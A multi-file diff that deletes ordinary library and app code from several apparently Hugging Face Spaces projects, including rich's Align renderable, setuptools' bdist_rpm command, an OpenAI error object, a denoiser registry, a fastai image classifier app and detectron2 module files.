-                    blank_lines(top_space),
-                    generate_segments(),
-                    blank_lines(bottom_space),
-                )
-            else:  # self.vertical == "bottom":
-                top_space = vertical_height - height
-                iter_segments = chain(blank_lines(top_space), generate_segments())
-        else:
-            iter_segments = generate_segments()
-        if self.style:
-            style = console.get_style(self.style)
-            iter_segments = Segment.apply_style(iter_segments, style)
-        yield from iter_segments
-
-    def __rich_measure__(
-        self, console: "Console", options: "ConsoleOptions"
-    ) -> Measurement:
-        measurement = Measurement.get(console, options, self.renderable)
-        return measurement
-
-
-class VerticalCenter(JupyterMixin):
-    """Vertically aligns a renderable.
-
-    Warn:
-        This class is deprecated and may be removed in a future version. Use Align class with
-        `vertical="middle"`.
-
-    Args:
-        renderable (RenderableType): A renderable object.
-    """
-
-    def __init__(
-        self,
-        renderable: "RenderableType",
-        style: Optional[StyleType] = None,
-    ) -> None:
-        self.renderable = renderable
-        self.style = style
-
-    def __repr__(self) -> str:
-        return f"VerticalCenter({self.renderable!r})"
-
-    def __rich_console__(
-        self, console: "Console", options: "ConsoleOptions"
-    ) -> "RenderResult":
-        style = console.get_style(self.style) if self.style is not None else None
-        lines = console.render_lines(
-            self.renderable, options.update(height=None), pad=False
-        )
-        width, _height = Segment.get_shape(lines)
-        new_line = Segment.line()
-        height = options.height or options.size.height
-        top_space = (height - len(lines)) // 2
-        bottom_space = height - top_space - len(lines)
-        blank_line = Segment(f"{' ' * width}", style)
-
-        def blank_lines(count: int) -> Iterable[Segment]:
-            for _ in range(count):
-                yield blank_line
-                yield new_line
-
-        if top_space > 0:
-            yield from blank_lines(top_space)
-        for line in lines:
-            yield from line
-            yield new_line
-        if bottom_space > 0:
-            yield from blank_lines(bottom_space)
-
-    def __rich_measure__(
-        self, console: "Console", options: "ConsoleOptions"
-    ) -> Measurement:
-        measurement = Measurement.get(console, options, self.renderable)
-        return measurement
-
-
-if __name__ == "__main__":  # pragma: no cover
-    from pip._vendor.rich.console import Console, Group
-    from pip._vendor.rich.highlighter import ReprHighlighter
-    from pip._vendor.rich.panel import Panel
-
-    highlighter = ReprHighlighter()
-    console = Console()
-
-    panel = Panel(
-        Group(
-            Align.left(highlighter("align='left'")),
-            Align.center(highlighter("align='center'")),
-            Align.right(highlighter("align='right'")),
-        ),
-        width=60,
-        style="on dark_blue",
-        title="Align",
-    )
-
-    console.print(
-        Align.center(panel, vertical="middle", style="on red", height=console.height)
-    )
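The `center` branch of `generate_segments` above splits leftover width with floor division, giving any odd column to the right side; the vertical `middle` branch does the same for rows. A minimal sketch of that arithmetic (the helper name is illustrative):

```python
def center_pad(excess_space):
    """Split excess space the way Align's "center"/"middle" branches do:
    floor half on the left/top, the remainder on the right/bottom."""
    left = excess_space // 2
    right = excess_space - left
    return left, right

print(center_pad(5))  # (2, 3): the odd leftover column goes to the right
print(center_pad(4))  # (2, 2)
```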
spaces/Big-Web/MMSD/env/Lib/site-packages/setuptools/_distutils/command/bdist_rpm.py
DELETED
@@ -1,615 +0,0 @@
-"""distutils.command.bdist_rpm
-
-Implements the Distutils 'bdist_rpm' command (create RPM source and binary
-distributions)."""
-
-import subprocess
-import sys
-import os
-
-from distutils.core import Command
-from distutils.debug import DEBUG
-from distutils.file_util import write_file
-from distutils.errors import (
-    DistutilsOptionError,
-    DistutilsPlatformError,
-    DistutilsFileError,
-    DistutilsExecError,
-)
-from distutils.sysconfig import get_python_version
-from distutils import log
-
-
-class bdist_rpm(Command):
-
-    description = "create an RPM distribution"
-
-    user_options = [
-        ('bdist-base=', None, "base directory for creating built distributions"),
-        (
-            'rpm-base=',
-            None,
-            "base directory for creating RPMs (defaults to \"rpm\" under "
-            "--bdist-base; must be specified for RPM 2)",
-        ),
-        (
-            'dist-dir=',
-            'd',
-            "directory to put final RPM files in " "(and .spec files if --spec-only)",
-        ),
-        (
-            'python=',
-            None,
-            "path to Python interpreter to hard-code in the .spec file "
-            "(default: \"python\")",
-        ),
-        (
-            'fix-python',
-            None,
-            "hard-code the exact path to the current Python interpreter in "
-            "the .spec file",
-        ),
-        ('spec-only', None, "only regenerate spec file"),
-        ('source-only', None, "only generate source RPM"),
-        ('binary-only', None, "only generate binary RPM"),
-        ('use-bzip2', None, "use bzip2 instead of gzip to create source distribution"),
-        # More meta-data: too RPM-specific to put in the setup script,
-        # but needs to go in the .spec file -- so we make these options
-        # to "bdist_rpm".  The idea is that packagers would put this
-        # info in setup.cfg, although they are of course free to
-        # supply it on the command line.
-        (
-            'distribution-name=',
-            None,
-            "name of the (Linux) distribution to which this "
-            "RPM applies (*not* the name of the module distribution!)",
-        ),
-        ('group=', None, "package classification [default: \"Development/Libraries\"]"),
-        ('release=', None, "RPM release number"),
-        ('serial=', None, "RPM serial number"),
-        (
-            'vendor=',
-            None,
-            "RPM \"vendor\" (eg. \"Joe Blow <[email protected]>\") "
-            "[default: maintainer or author from setup script]",
-        ),
-        (
-            'packager=',
-            None,
-            "RPM packager (eg. \"Jane Doe <[email protected]>\") " "[default: vendor]",
-        ),
-        ('doc-files=', None, "list of documentation files (space or comma-separated)"),
-        ('changelog=', None, "RPM changelog"),
-        ('icon=', None, "name of icon file"),
-        ('provides=', None, "capabilities provided by this package"),
-        ('requires=', None, "capabilities required by this package"),
-        ('conflicts=', None, "capabilities which conflict with this package"),
-        ('build-requires=', None, "capabilities required to build this package"),
-        ('obsoletes=', None, "capabilities made obsolete by this package"),
-        ('no-autoreq', None, "do not automatically calculate dependencies"),
-        # Actions to take when building RPM
-        ('keep-temp', 'k', "don't clean up RPM build directory"),
-        ('no-keep-temp', None, "clean up RPM build directory [default]"),
-        (
-            'use-rpm-opt-flags',
-            None,
-            "compile with RPM_OPT_FLAGS when building from source RPM",
-        ),
-        ('no-rpm-opt-flags', None, "do not pass any RPM CFLAGS to compiler"),
-        ('rpm3-mode', None, "RPM 3 compatibility mode (default)"),
-        ('rpm2-mode', None, "RPM 2 compatibility mode"),
-        # Add the hooks necessary for specifying custom scripts
-        ('prep-script=', None, "Specify a script for the PREP phase of RPM building"),
-        ('build-script=', None, "Specify a script for the BUILD phase of RPM building"),
-        (
-            'pre-install=',
-            None,
-            "Specify a script for the pre-INSTALL phase of RPM building",
-        ),
-        (
-            'install-script=',
-            None,
-            "Specify a script for the INSTALL phase of RPM building",
-        ),
-        (
-            'post-install=',
-            None,
-            "Specify a script for the post-INSTALL phase of RPM building",
-        ),
-        (
-            'pre-uninstall=',
-            None,
-            "Specify a script for the pre-UNINSTALL phase of RPM building",
-        ),
-        (
-            'post-uninstall=',
-            None,
-            "Specify a script for the post-UNINSTALL phase of RPM building",
-        ),
-        ('clean-script=', None, "Specify a script for the CLEAN phase of RPM building"),
-        (
-            'verify-script=',
-            None,
-            "Specify a script for the VERIFY phase of the RPM build",
-        ),
-        # Allow a packager to explicitly force an architecture
-        ('force-arch=', None, "Force an architecture onto the RPM build process"),
-        ('quiet', 'q', "Run the INSTALL phase of RPM building in quiet mode"),
-    ]
-
-    boolean_options = [
-        'keep-temp',
-        'use-rpm-opt-flags',
-        'rpm3-mode',
-        'no-autoreq',
-        'quiet',
-    ]
-
-    negative_opt = {
-        'no-keep-temp': 'keep-temp',
-        'no-rpm-opt-flags': 'use-rpm-opt-flags',
-        'rpm2-mode': 'rpm3-mode',
-    }
-
-    def initialize_options(self):
-        self.bdist_base = None
-        self.rpm_base = None
-        self.dist_dir = None
-        self.python = None
-        self.fix_python = None
-        self.spec_only = None
-        self.binary_only = None
-        self.source_only = None
-        self.use_bzip2 = None
-
-        self.distribution_name = None
-        self.group = None
-        self.release = None
-        self.serial = None
-        self.vendor = None
-        self.packager = None
-        self.doc_files = None
-        self.changelog = None
-        self.icon = None
-
-        self.prep_script = None
-        self.build_script = None
-        self.install_script = None
|
178 |
-
self.clean_script = None
|
179 |
-
self.verify_script = None
|
180 |
-
self.pre_install = None
|
181 |
-
self.post_install = None
|
182 |
-
self.pre_uninstall = None
|
183 |
-
self.post_uninstall = None
|
184 |
-
self.prep = None
|
185 |
-
self.provides = None
|
186 |
-
self.requires = None
|
187 |
-
self.conflicts = None
|
188 |
-
self.build_requires = None
|
189 |
-
self.obsoletes = None
|
190 |
-
|
191 |
-
self.keep_temp = 0
|
192 |
-
self.use_rpm_opt_flags = 1
|
193 |
-
self.rpm3_mode = 1
|
194 |
-
self.no_autoreq = 0
|
195 |
-
|
196 |
-
self.force_arch = None
|
197 |
-
self.quiet = 0
|
198 |
-
|
199 |
-
def finalize_options(self):
|
200 |
-
self.set_undefined_options('bdist', ('bdist_base', 'bdist_base'))
|
201 |
-
if self.rpm_base is None:
|
202 |
-
if not self.rpm3_mode:
|
203 |
-
raise DistutilsOptionError("you must specify --rpm-base in RPM 2 mode")
|
204 |
-
self.rpm_base = os.path.join(self.bdist_base, "rpm")
|
205 |
-
|
206 |
-
if self.python is None:
|
207 |
-
if self.fix_python:
|
208 |
-
self.python = sys.executable
|
209 |
-
else:
|
210 |
-
self.python = "python3"
|
211 |
-
elif self.fix_python:
|
212 |
-
raise DistutilsOptionError(
|
213 |
-
"--python and --fix-python are mutually exclusive options"
|
214 |
-
)
|
215 |
-
|
216 |
-
if os.name != 'posix':
|
217 |
-
raise DistutilsPlatformError(
|
218 |
-
"don't know how to create RPM " "distributions on platform %s" % os.name
|
219 |
-
)
|
220 |
-
if self.binary_only and self.source_only:
|
221 |
-
raise DistutilsOptionError(
|
222 |
-
"cannot supply both '--source-only' and '--binary-only'"
|
223 |
-
)
|
224 |
-
|
225 |
-
# don't pass CFLAGS to pure python distributions
|
226 |
-
if not self.distribution.has_ext_modules():
|
227 |
-
self.use_rpm_opt_flags = 0
|
228 |
-
|
229 |
-
self.set_undefined_options('bdist', ('dist_dir', 'dist_dir'))
|
230 |
-
self.finalize_package_data()
|
231 |
-
|
232 |
-
def finalize_package_data(self):
|
233 |
-
self.ensure_string('group', "Development/Libraries")
|
234 |
-
self.ensure_string(
|
235 |
-
'vendor',
|
236 |
-
"%s <%s>"
|
237 |
-
% (self.distribution.get_contact(), self.distribution.get_contact_email()),
|
238 |
-
)
|
239 |
-
self.ensure_string('packager')
|
240 |
-
self.ensure_string_list('doc_files')
|
241 |
-
if isinstance(self.doc_files, list):
|
242 |
-
for readme in ('README', 'README.txt'):
|
243 |
-
if os.path.exists(readme) and readme not in self.doc_files:
|
244 |
-
self.doc_files.append(readme)
|
245 |
-
|
246 |
-
self.ensure_string('release', "1")
|
247 |
-
self.ensure_string('serial') # should it be an int?
|
248 |
-
|
249 |
-
self.ensure_string('distribution_name')
|
250 |
-
|
251 |
-
self.ensure_string('changelog')
|
252 |
-
# Format changelog correctly
|
253 |
-
self.changelog = self._format_changelog(self.changelog)
|
254 |
-
|
255 |
-
self.ensure_filename('icon')
|
256 |
-
|
257 |
-
self.ensure_filename('prep_script')
|
258 |
-
self.ensure_filename('build_script')
|
259 |
-
self.ensure_filename('install_script')
|
260 |
-
self.ensure_filename('clean_script')
|
261 |
-
self.ensure_filename('verify_script')
|
262 |
-
self.ensure_filename('pre_install')
|
263 |
-
self.ensure_filename('post_install')
|
264 |
-
self.ensure_filename('pre_uninstall')
|
265 |
-
self.ensure_filename('post_uninstall')
|
266 |
-
|
267 |
-
# XXX don't forget we punted on summaries and descriptions -- they
|
268 |
-
# should be handled here eventually!
|
269 |
-
|
270 |
-
# Now *this* is some meta-data that belongs in the setup script...
|
271 |
-
self.ensure_string_list('provides')
|
272 |
-
self.ensure_string_list('requires')
|
273 |
-
self.ensure_string_list('conflicts')
|
274 |
-
self.ensure_string_list('build_requires')
|
275 |
-
self.ensure_string_list('obsoletes')
|
276 |
-
|
277 |
-
self.ensure_string('force_arch')
|
278 |
-
|
279 |
-
def run(self): # noqa: C901
|
280 |
-
if DEBUG:
|
281 |
-
print("before _get_package_data():")
|
282 |
-
print("vendor =", self.vendor)
|
283 |
-
print("packager =", self.packager)
|
284 |
-
print("doc_files =", self.doc_files)
|
285 |
-
print("changelog =", self.changelog)
|
286 |
-
|
287 |
-
# make directories
|
288 |
-
if self.spec_only:
|
289 |
-
spec_dir = self.dist_dir
|
290 |
-
self.mkpath(spec_dir)
|
291 |
-
else:
|
292 |
-
rpm_dir = {}
|
293 |
-
for d in ('SOURCES', 'SPECS', 'BUILD', 'RPMS', 'SRPMS'):
|
294 |
-
rpm_dir[d] = os.path.join(self.rpm_base, d)
|
295 |
-
self.mkpath(rpm_dir[d])
|
296 |
-
spec_dir = rpm_dir['SPECS']
|
297 |
-
|
298 |
-
# Spec file goes into 'dist_dir' if '--spec-only specified',
|
299 |
-
# build/rpm.<plat> otherwise.
|
300 |
-
spec_path = os.path.join(spec_dir, "%s.spec" % self.distribution.get_name())
|
301 |
-
self.execute(
|
302 |
-
write_file, (spec_path, self._make_spec_file()), "writing '%s'" % spec_path
|
303 |
-
)
|
304 |
-
|
305 |
-
if self.spec_only: # stop if requested
|
306 |
-
return
|
307 |
-
|
308 |
-
# Make a source distribution and copy to SOURCES directory with
|
309 |
-
# optional icon.
|
310 |
-
saved_dist_files = self.distribution.dist_files[:]
|
311 |
-
sdist = self.reinitialize_command('sdist')
|
312 |
-
if self.use_bzip2:
|
313 |
-
sdist.formats = ['bztar']
|
314 |
-
else:
|
315 |
-
sdist.formats = ['gztar']
|
316 |
-
self.run_command('sdist')
|
317 |
-
self.distribution.dist_files = saved_dist_files
|
318 |
-
|
319 |
-
source = sdist.get_archive_files()[0]
|
320 |
-
source_dir = rpm_dir['SOURCES']
|
321 |
-
self.copy_file(source, source_dir)
|
322 |
-
|
323 |
-
if self.icon:
|
324 |
-
if os.path.exists(self.icon):
|
325 |
-
self.copy_file(self.icon, source_dir)
|
326 |
-
else:
|
327 |
-
raise DistutilsFileError("icon file '%s' does not exist" % self.icon)
|
328 |
-
|
329 |
-
# build package
|
330 |
-
log.info("building RPMs")
|
331 |
-
rpm_cmd = ['rpmbuild']
|
332 |
-
|
333 |
-
if self.source_only: # what kind of RPMs?
|
334 |
-
rpm_cmd.append('-bs')
|
335 |
-
elif self.binary_only:
|
336 |
-
rpm_cmd.append('-bb')
|
337 |
-
else:
|
338 |
-
rpm_cmd.append('-ba')
|
339 |
-
rpm_cmd.extend(['--define', '__python %s' % self.python])
|
340 |
-
if self.rpm3_mode:
|
341 |
-
rpm_cmd.extend(['--define', '_topdir %s' % os.path.abspath(self.rpm_base)])
|
342 |
-
if not self.keep_temp:
|
343 |
-
rpm_cmd.append('--clean')
|
344 |
-
|
345 |
-
if self.quiet:
|
346 |
-
rpm_cmd.append('--quiet')
|
347 |
-
|
348 |
-
rpm_cmd.append(spec_path)
|
349 |
-
# Determine the binary rpm names that should be built out of this spec
|
350 |
-
# file
|
351 |
-
# Note that some of these may not be really built (if the file
|
352 |
-
# list is empty)
|
353 |
-
nvr_string = "%{name}-%{version}-%{release}"
|
354 |
-
src_rpm = nvr_string + ".src.rpm"
|
355 |
-
non_src_rpm = "%{arch}/" + nvr_string + ".%{arch}.rpm"
|
356 |
-
q_cmd = r"rpm -q --qf '{} {}\n' --specfile '{}'".format(
|
357 |
-
src_rpm,
|
358 |
-
non_src_rpm,
|
359 |
-
spec_path,
|
360 |
-
)
|
361 |
-
|
362 |
-
out = os.popen(q_cmd)
|
363 |
-
try:
|
364 |
-
binary_rpms = []
|
365 |
-
source_rpm = None
|
366 |
-
while True:
|
367 |
-
line = out.readline()
|
368 |
-
if not line:
|
369 |
-
break
|
370 |
-
ell = line.strip().split()
|
371 |
-
assert len(ell) == 2
|
372 |
-
binary_rpms.append(ell[1])
|
373 |
-
# The source rpm is named after the first entry in the spec file
|
374 |
-
if source_rpm is None:
|
375 |
-
source_rpm = ell[0]
|
376 |
-
|
377 |
-
status = out.close()
|
378 |
-
if status:
|
379 |
-
raise DistutilsExecError("Failed to execute: %s" % repr(q_cmd))
|
380 |
-
|
381 |
-
finally:
|
382 |
-
out.close()
|
383 |
-
|
384 |
-
self.spawn(rpm_cmd)
|
385 |
-
|
386 |
-
if not self.dry_run:
|
387 |
-
if self.distribution.has_ext_modules():
|
388 |
-
pyversion = get_python_version()
|
389 |
-
else:
|
390 |
-
pyversion = 'any'
|
391 |
-
|
392 |
-
if not self.binary_only:
|
393 |
-
srpm = os.path.join(rpm_dir['SRPMS'], source_rpm)
|
394 |
-
assert os.path.exists(srpm)
|
395 |
-
self.move_file(srpm, self.dist_dir)
|
396 |
-
filename = os.path.join(self.dist_dir, source_rpm)
|
397 |
-
self.distribution.dist_files.append(('bdist_rpm', pyversion, filename))
|
398 |
-
|
399 |
-
if not self.source_only:
|
400 |
-
for rpm in binary_rpms:
|
401 |
-
rpm = os.path.join(rpm_dir['RPMS'], rpm)
|
402 |
-
if os.path.exists(rpm):
|
403 |
-
self.move_file(rpm, self.dist_dir)
|
404 |
-
filename = os.path.join(self.dist_dir, os.path.basename(rpm))
|
405 |
-
self.distribution.dist_files.append(
|
406 |
-
('bdist_rpm', pyversion, filename)
|
407 |
-
)
|
408 |
-
|
409 |
-
def _dist_path(self, path):
|
410 |
-
return os.path.join(self.dist_dir, os.path.basename(path))
|
411 |
-
|
412 |
-
def _make_spec_file(self): # noqa: C901
|
413 |
-
"""Generate the text of an RPM spec file and return it as a
|
414 |
-
list of strings (one per line).
|
415 |
-
"""
|
416 |
-
# definitions and headers
|
417 |
-
spec_file = [
|
418 |
-
'%define name ' + self.distribution.get_name(),
|
419 |
-
'%define version ' + self.distribution.get_version().replace('-', '_'),
|
420 |
-
'%define unmangled_version ' + self.distribution.get_version(),
|
421 |
-
'%define release ' + self.release.replace('-', '_'),
|
422 |
-
'',
|
423 |
-
'Summary: ' + (self.distribution.get_description() or "UNKNOWN"),
|
424 |
-
]
|
425 |
-
|
426 |
-
# Workaround for #14443 which affects some RPM based systems such as
|
427 |
-
# RHEL6 (and probably derivatives)
|
428 |
-
vendor_hook = subprocess.getoutput('rpm --eval %{__os_install_post}')
|
429 |
-
# Generate a potential replacement value for __os_install_post (whilst
|
430 |
-
# normalizing the whitespace to simplify the test for whether the
|
431 |
-
# invocation of brp-python-bytecompile passes in __python):
|
432 |
-
vendor_hook = '\n'.join(
|
433 |
-
[' %s \\' % line.strip() for line in vendor_hook.splitlines()]
|
434 |
-
)
|
435 |
-
problem = "brp-python-bytecompile \\\n"
|
436 |
-
fixed = "brp-python-bytecompile %{__python} \\\n"
|
437 |
-
fixed_hook = vendor_hook.replace(problem, fixed)
|
438 |
-
if fixed_hook != vendor_hook:
|
439 |
-
spec_file.append('# Workaround for http://bugs.python.org/issue14443')
|
440 |
-
spec_file.append('%define __os_install_post ' + fixed_hook + '\n')
|
441 |
-
|
442 |
-
# put locale summaries into spec file
|
443 |
-
# XXX not supported for now (hard to put a dictionary
|
444 |
-
# in a config file -- arg!)
|
445 |
-
# for locale in self.summaries.keys():
|
446 |
-
# spec_file.append('Summary(%s): %s' % (locale,
|
447 |
-
# self.summaries[locale]))
|
448 |
-
|
449 |
-
spec_file.extend(
|
450 |
-
[
|
451 |
-
'Name: %{name}',
|
452 |
-
'Version: %{version}',
|
453 |
-
'Release: %{release}',
|
454 |
-
]
|
455 |
-
)
|
456 |
-
|
457 |
-
# XXX yuck! this filename is available from the "sdist" command,
|
458 |
-
# but only after it has run: and we create the spec file before
|
459 |
-
# running "sdist", in case of --spec-only.
|
460 |
-
if self.use_bzip2:
|
461 |
-
spec_file.append('Source0: %{name}-%{unmangled_version}.tar.bz2')
|
462 |
-
else:
|
463 |
-
spec_file.append('Source0: %{name}-%{unmangled_version}.tar.gz')
|
464 |
-
|
465 |
-
spec_file.extend(
|
466 |
-
[
|
467 |
-
'License: ' + (self.distribution.get_license() or "UNKNOWN"),
|
468 |
-
'Group: ' + self.group,
|
469 |
-
'BuildRoot: %{_tmppath}/%{name}-%{version}-%{release}-buildroot',
|
470 |
-
'Prefix: %{_prefix}',
|
471 |
-
]
|
472 |
-
)
|
473 |
-
|
474 |
-
if not self.force_arch:
|
475 |
-
# noarch if no extension modules
|
476 |
-
if not self.distribution.has_ext_modules():
|
477 |
-
spec_file.append('BuildArch: noarch')
|
478 |
-
else:
|
479 |
-
spec_file.append('BuildArch: %s' % self.force_arch)
|
480 |
-
|
481 |
-
for field in (
|
482 |
-
'Vendor',
|
483 |
-
'Packager',
|
484 |
-
'Provides',
|
485 |
-
'Requires',
|
486 |
-
'Conflicts',
|
487 |
-
'Obsoletes',
|
488 |
-
):
|
489 |
-
val = getattr(self, field.lower())
|
490 |
-
if isinstance(val, list):
|
491 |
-
spec_file.append('{}: {}'.format(field, ' '.join(val)))
|
492 |
-
elif val is not None:
|
493 |
-
spec_file.append('{}: {}'.format(field, val))
|
494 |
-
|
495 |
-
if self.distribution.get_url():
|
496 |
-
spec_file.append('Url: ' + self.distribution.get_url())
|
497 |
-
|
498 |
-
if self.distribution_name:
|
499 |
-
spec_file.append('Distribution: ' + self.distribution_name)
|
500 |
-
|
501 |
-
if self.build_requires:
|
502 |
-
spec_file.append('BuildRequires: ' + ' '.join(self.build_requires))
|
503 |
-
|
504 |
-
if self.icon:
|
505 |
-
spec_file.append('Icon: ' + os.path.basename(self.icon))
|
506 |
-
|
507 |
-
if self.no_autoreq:
|
508 |
-
spec_file.append('AutoReq: 0')
|
509 |
-
|
510 |
-
spec_file.extend(
|
511 |
-
[
|
512 |
-
'',
|
513 |
-
'%description',
|
514 |
-
self.distribution.get_long_description() or "",
|
515 |
-
]
|
516 |
-
)
|
517 |
-
|
518 |
-
# put locale descriptions into spec file
|
519 |
-
# XXX again, suppressed because config file syntax doesn't
|
520 |
-
# easily support this ;-(
|
521 |
-
# for locale in self.descriptions.keys():
|
522 |
-
# spec_file.extend([
|
523 |
-
# '',
|
524 |
-
# '%description -l ' + locale,
|
525 |
-
# self.descriptions[locale],
|
526 |
-
# ])
|
527 |
-
|
528 |
-
# rpm scripts
|
529 |
-
# figure out default build script
|
530 |
-
def_setup_call = "{} {}".format(self.python, os.path.basename(sys.argv[0]))
|
531 |
-
def_build = "%s build" % def_setup_call
|
532 |
-
if self.use_rpm_opt_flags:
|
533 |
-
def_build = 'env CFLAGS="$RPM_OPT_FLAGS" ' + def_build
|
534 |
-
|
535 |
-
# insert contents of files
|
536 |
-
|
537 |
-
# XXX this is kind of misleading: user-supplied options are files
|
538 |
-
# that we open and interpolate into the spec file, but the defaults
|
539 |
-
# are just text that we drop in as-is. Hmmm.
|
540 |
-
|
541 |
-
install_cmd = (
|
542 |
-
'%s install -O1 --root=$RPM_BUILD_ROOT ' '--record=INSTALLED_FILES'
|
543 |
-
) % def_setup_call
|
544 |
-
|
545 |
-
script_options = [
|
546 |
-
('prep', 'prep_script', "%setup -n %{name}-%{unmangled_version}"),
|
547 |
-
('build', 'build_script', def_build),
|
548 |
-
('install', 'install_script', install_cmd),
|
549 |
-
('clean', 'clean_script', "rm -rf $RPM_BUILD_ROOT"),
|
550 |
-
('verifyscript', 'verify_script', None),
|
551 |
-
('pre', 'pre_install', None),
|
552 |
-
('post', 'post_install', None),
|
553 |
-
('preun', 'pre_uninstall', None),
|
554 |
-
('postun', 'post_uninstall', None),
|
555 |
-
]
|
556 |
-
|
557 |
-
for (rpm_opt, attr, default) in script_options:
|
558 |
-
# Insert contents of file referred to, if no file is referred to
|
559 |
-
# use 'default' as contents of script
|
560 |
-
val = getattr(self, attr)
|
561 |
-
if val or default:
|
562 |
-
spec_file.extend(
|
563 |
-
[
|
564 |
-
'',
|
565 |
-
'%' + rpm_opt,
|
566 |
-
]
|
567 |
-
)
|
568 |
-
if val:
|
569 |
-
with open(val) as f:
|
570 |
-
spec_file.extend(f.read().split('\n'))
|
571 |
-
else:
|
572 |
-
spec_file.append(default)
|
573 |
-
|
574 |
-
# files section
|
575 |
-
spec_file.extend(
|
576 |
-
[
|
577 |
-
'',
|
578 |
-
'%files -f INSTALLED_FILES',
|
579 |
-
'%defattr(-,root,root)',
|
580 |
-
]
|
581 |
-
)
|
582 |
-
|
583 |
-
if self.doc_files:
|
584 |
-
spec_file.append('%doc ' + ' '.join(self.doc_files))
|
585 |
-
|
586 |
-
if self.changelog:
|
587 |
-
spec_file.extend(
|
588 |
-
[
|
589 |
-
'',
|
590 |
-
'%changelog',
|
591 |
-
]
|
592 |
-
)
|
593 |
-
spec_file.extend(self.changelog)
|
594 |
-
|
595 |
-
return spec_file
|
596 |
-
|
597 |
-
def _format_changelog(self, changelog):
|
598 |
-
"""Format the changelog correctly and convert it to a list of strings"""
|
599 |
-
if not changelog:
|
600 |
-
return changelog
|
601 |
-
new_changelog = []
|
602 |
-
for line in changelog.strip().split('\n'):
|
603 |
-
line = line.strip()
|
604 |
-
if line[0] == '*':
|
605 |
-
new_changelog.extend(['', line])
|
606 |
-
elif line[0] == '-':
|
607 |
-
new_changelog.append(line)
|
608 |
-
else:
|
609 |
-
new_changelog.append(' ' + line)
|
610 |
-
|
611 |
-
# strip trailing newline inserted by first changelog entry
|
612 |
-
if not new_changelog[0]:
|
613 |
-
del new_changelog[0]
|
614 |
-
|
615 |
-
return new_changelog
|
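The `_format_changelog` helper in the deleted command above normalizes a free-form changelog string into RPM spec-file lines: entry headers (`*`) get a blank line before them, bullet lines (`-`) pass through, and anything else is indented as a continuation. A minimal standalone sketch of that behavior (plain Python; the function name here is mine, not part of the deleted file):

```python
def format_changelog(changelog):
    """Normalize a free-form changelog string into RPM spec %changelog lines."""
    if not changelog:
        return changelog
    new_changelog = []
    for line in changelog.strip().split('\n'):
        line = line.strip()
        if line[0] == '*':
            # entry header: separate entries with a blank line
            new_changelog.extend(['', line])
        elif line[0] == '-':
            # bullet item: keep as-is
            new_changelog.append(line)
        else:
            # continuation text: indent under the previous bullet
            new_changelog.append('  ' + line)
    # drop the leading blank line inserted by the first entry header
    if not new_changelog[0]:
        del new_changelog[0]
    return new_changelog
```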
spaces/Boadiwaa/Recipes/openai/api_resources/error_object.py
DELETED
@@ -1,22 +0,0 @@
-from typing import Optional
-
-from openai.openai_object import OpenAIObject
-from openai.util import merge_dicts
-
-
-class ErrorObject(OpenAIObject):
-    def refresh_from(
-        self,
-        values,
-        api_key=None,
-        api_version=None,
-        organization=None,
-        response_ms: Optional[int] = None,
-    ):
-        # Unlike most other API resources, the API will omit attributes in
-        # error objects when they have a null value. We manually set default
-        # values here to facilitate generic error handling.
-        values = merge_dicts({"message": None, "type": None}, values)
-        return super(ErrorObject, self).refresh_from(
-            values, api_key, api_version, organization, response_ms
-        )
spaces/BorisovMaksim/denoising/denoisers/__init__.py
DELETED
@@ -1,14 +0,0 @@
-from denoisers.demucs import Demucs
-from denoisers.SpectralGating import SpectralGating
-
-
-MODEL_POOL = {
-    'demucs': Demucs,
-    'baseline': SpectralGating
-}
-
-
-def get_model(model_config):
-    name, params = list(model_config.items())[0]
-    return MODEL_POOL[name](params)
-
spaces/BradAllgood/fastai_chapter2_new/app.py
DELETED
@@ -1,28 +0,0 @@
-import gradio as gr
-from fastai.vision.all import *
-import pathlib
-plt = platform.system()
-if plt == 'Windows': pathlib.PosixPath = pathlib.WindowsPath
-
-def is_cat(x): return x[0].isupper()
-
-def greet(name):
-    return "Hello " + name + "!!"
-
-learn = load_learner('is_cat_model.pkl')
-
-
-categories = ('Dog','Cat')
-
-def classify_image(img):
-    pred,idx,probs = learn.predict(img)
-    return dict(zip(categories,map(float,probs)))
-
-image = gr.inputs.Image(shape=(192,192))
-label = gr.outputs.Label()
-examples = ['dog.jpg','cat.jpg','dunno.jpg']
-
-intf = gr.Interface(fn=classify_image, inputs = image, outputs= label, examples = examples, theme=gr.themes.Soft())
-
-intf.launch(inline=False)
-
spaces/CVPR/Dual-Key_Backdoor_Attacks/datagen/detectron2/.github/pull_request_template.md
DELETED
@@ -1,8 +0,0 @@
-Thanks for your contribution!
-
-If you're sending a large PR (e.g., >50 lines),
-please open an issue first about the feature / bug, and indicate how you want to contribute.
-See more at https://detectron2.readthedocs.io/notes/contributing.html#pull-requests
-about how we handle PRs.
-
-Before submitting a PR, please run `dev/linter.sh` to lint the code.
spaces/CVPR/Dual-Key_Backdoor_Attacks/datagen/detectron2/detectron2/modeling/__init__.py
DELETED
@@ -1,56 +0,0 @@
-# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved
-import torch
-
-from detectron2.layers import ShapeSpec
-
-from .anchor_generator import build_anchor_generator, ANCHOR_GENERATOR_REGISTRY
-from .backbone import (
-    BACKBONE_REGISTRY,
-    FPN,
-    Backbone,
-    ResNet,
-    ResNetBlockBase,
-    build_backbone,
-    build_resnet_backbone,
-    make_stage,
-)
-from .meta_arch import (
-    META_ARCH_REGISTRY,
-    SEM_SEG_HEADS_REGISTRY,
-    GeneralizedRCNN,
-    PanopticFPN,
-    ProposalNetwork,
-    RetinaNet,
-    SemanticSegmentor,
-    build_model,
-    build_sem_seg_head,
-)
-from .postprocessing import detector_postprocess
-from .proposal_generator import (
-    PROPOSAL_GENERATOR_REGISTRY,
-    build_proposal_generator,
-    RPN_HEAD_REGISTRY,
-    build_rpn_head,
-)
-from .roi_heads import (
-    ROI_BOX_HEAD_REGISTRY,
-    ROI_HEADS_REGISTRY,
-    ROI_KEYPOINT_HEAD_REGISTRY,
-    ROI_MASK_HEAD_REGISTRY,
-    ROIHeads,
-    StandardROIHeads,
-    BaseMaskRCNNHead,
-    BaseKeypointRCNNHead,
-    build_box_head,
-    build_keypoint_head,
-    build_mask_head,
-    build_roi_heads,
-)
-from .test_time_augmentation import DatasetMapperTTA, GeneralizedRCNNWithTTA
-
-_EXCLUDE = {"torch", "ShapeSpec"}
-__all__ = [k for k in globals().keys() if k not in _EXCLUDE and not k.startswith("_")]
-
-assert (
-    torch.Tensor([1]) == torch.Tensor([2])
-).dtype == torch.bool, "Your Pytorch is too old. Please update to contain https://github.com/pytorch/pytorch/pull/21113"
